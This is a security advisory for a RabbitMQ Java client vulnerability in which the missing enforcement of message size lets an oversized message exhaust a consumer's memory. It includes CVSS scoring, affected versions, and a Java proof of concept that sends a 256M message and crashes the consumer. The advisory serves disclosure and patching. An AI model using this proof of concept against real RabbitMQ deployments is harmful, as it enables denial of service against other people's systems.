Lucene search

GoogleOSV:GHSA-MM8H-8587-P46H

HistoryOct 24, 2023 - 1:49 a.m.

RabbitMQ Java client's Lack of Message Size Limitation leads to Remote DoS Attack

2023-10-2401:49:09

Google

osv.dev

rabbitmq

java client

message size

limitation

remote attack

dos

memory overflow

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

8 High

AI Score

Confidence

High

0.002 Low

EPSS

Percentile

59.0%

JSON

Summary

maxBodyLebgth was not used when receiving Message objects. Attackers could just send a very large Message causing a memory overflow and triggering an OOM Error.

PoC

RbbitMQ

Use RabbitMQ 3.11.16 as MQ and specify Message Body size 512M (here it only needs to be larger than the Consumer memory)
Start RabbitMQ

Producer

Build a String of length 256M and send it to Consumer


package org.springframework.amqp.helloworld; 

import org.springframework.amqp.core.AmqpTemplate; 
import org.springframework.context.ApplicationContext; 
import org.springframework.context.annotation.AnnotationConfigApplicationContext; 

public class Producer {
    public static void main(String[] args) {
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class); 
        String s = "A";
        for(int i=0;i&lt;28;++i){
            s = s + s;
            System.out.println(i);
        }
        amqpTemplate.convertAndSend(s);
        System.out.println("Send Finish");
    }
 }

Consumer

First set the heap memory size to 128M
Read the message sent by the Producer from the MQ and print the length

package org.springframework.amqp.helloworld;

import org.springframework.amqp.core.AmqpTemplate;
import org.springframework.amqp.core.Message;
import org.springframework.context.ApplicationContext;
import org.springframework.context.annotation.AnnotationConfigApplicationContext;

public class Consumer {
    
    public static void main(String[] args) {
        ApplicationContext context = new AnnotationConfigApplicationContext(HelloWorldConfiguration.class);
        AmqpTemplate amqpTemplate = context.getBean(AmqpTemplate.class);
        Object o = amqpTemplate.receiveAndConvert();
        if(o != null){
            String s = o.toString();
            System.out.println("Received Length : " + s.length());
        }else{
            System.out.println("null");
        }
    }
}

Results

Run the Producer first, then the Consumer
Consumer throws OOM Exception

Impact

Users of RabbitMQ may suffer from DoS attacks from RabbitMQ Java client which will ultimately exhaust the memory of the consumer.

CPENameOperatorVersion
com.rabbitmq:amqp-clienteq3.1.2
com.rabbitmq:amqp-clienteq5.4.0
com.rabbitmq:amqp-clienteq5.0.0
com.rabbitmq:amqp-clienteq1.6.0
com.rabbitmq:amqp-clienteq3.3.1
com.rabbitmq:amqp-clienteq4.9.0
com.rabbitmq:amqp-clienteq5.16.0
com.rabbitmq:amqp-clienteq3.6.3
com.rabbitmq:amqp-clienteq5.5.2
com.rabbitmq:amqp-clienteq5.11.0

Name	Operator	Version
com.rabbitmq:amqp-client	eq	3.1.2
com.rabbitmq:amqp-client	eq	5.4.0
com.rabbitmq:amqp-client	eq	5.0.0
com.rabbitmq:amqp-client	eq	1.6.0
com.rabbitmq:amqp-client	eq	3.3.1
com.rabbitmq:amqp-client	eq	4.9.0
com.rabbitmq:amqp-client	eq	5.16.0
com.rabbitmq:amqp-client	eq	3.6.3
com.rabbitmq:amqp-client	eq	5.5.2
com.rabbitmq:amqp-client	eq	5.11.0